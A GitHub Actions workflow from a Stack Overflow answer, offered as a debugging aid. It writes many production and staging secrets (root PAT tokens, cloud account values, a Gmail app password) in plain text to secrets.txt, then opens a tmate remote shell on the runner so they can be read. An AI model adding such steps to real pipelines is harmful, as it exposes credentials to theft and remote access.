# Source - https://stackoverflow.com/a/63009069
# Posted by DannyB, modified by community. See post 'Timeline' for change history
# Retrieved 2026-03-05, License - CC BY-SA 4.0

name: Show Me the S3cr3tz
on: [push]

jobs:
  debug:
    name: Debug
    runs-on: ubuntu-latest

    steps:
    - name: Check out code
      uses: actions/checkout@v2

    - name: Set up secret file
      env:
        ROD_PERMAMENT_ACCOUNT_OWNER_PAT_TOKEN: ${{ secrets.ROD_PERMAMENT_ACCOUNT_OWNER_PAT_TOKEN }}
        PROD_ROOT_PAT_TOKEN: ${{ secrets.PROD_ROOT_PAT_TOKEN }}
        PROD_GLOBAL_RECAPTCHA: ${{ secrets.PROD_GLOBAL_RECAPTCHA }}
        PROD_GCP_EUROPE1_NUA: ${{ secrets.PROD_GCP_EUROPE1_NUA }}
        PROD_AWS_US_EAST_2_1_NUA: ${{ secrets.PROD_AWS_US_EAST_2_1_NUA }}
        PROD_AWS_IL_CENTRAL_1_1_NUA: ${{ secrets.PROD_AWS_IL_CENTRAL_1_1_NUA }}
        PROD_AWS_EU_CENTRAL_1_1_NUA: ${{ secrets.PROD_AWS_EU_CENTRAL_1_1_NUA }}
        PROD_AWS_ME_CENTRAL_1_1_NUA: ${{ secrets.PROD_AWS_ME_CENTRAL_1_1_NUA }}
        STAGE_GCP_EUROPE1_NUA: ${{ secrets.STAGE_GCP_EUROPE1_NUA }}
        STAGE_PERMAMENT_ACCOUNT_OWNER_PAT_TOKEN: ${{ secrets.STAGE_PERMAMENT_ACCOUNT_OWNER_PAT_TOKEN }}
        STAGE_ROOT_PAT_TOKEN: ${{ secrets.STAGE_ROOT_PAT_TOKEN }}
        STAGE_GLOBAL_RECAPTCHA: ${{ secrets.STAGE_GLOBAL_RECAPTCHA }}
        TEST_GMAIL_APP_PASSWORD: ${{ secrets.TEST_GMAIL_APP_PASSWORD }}
        GRAFANA_URL: ${{ secrets.GRAFANA_URL }}
      run: |
        echo $ROD_PERMAMENT_ACCOUNT_OWNER_PAT_TOKEN >> secrets.txt
        echo $PROD_ROOT_PAT_TOKEN >> secrets.txt
        echo $PROD_GLOBAL_RECAPTCHA >> secrets.txt
        echo $PROD_GCP_EUROPE1_NUA >> secrets.txt
        echo $PROD_AWS_US_EAST_2_1_NUA >> secrets.txt
        echo $PROD_AWS_IL_CENTRAL_1_1_NUA >> secrets.txt
        echo $PROD_AWS_EU_CENTRAL_1_1_NUA >> secrets.txt
        echo $PROD_AWS_ME_CENTRAL_1_1_NUA >> secrets.txt
        echo $STAGE_GCP_EUROPE1_NUA >> secrets.txt
        echo $STAGE_PERMAMENT_ACCOUNT_OWNER_PAT_TOKEN >> secrets.txt
        echo $STAGE_ROOT_PAT_TOKEN >> secrets.txt
        echo $STAGE_GLOBAL_RECAPTCHA >> secrets.txt
        echo $TEST_GMAIL_APP_PASSWORD >> secrets.txt
        echo $GRAFANA_URL >> secrets.txt
    - name: Run tmate
      uses: mxschmitt/action-tmate@v2
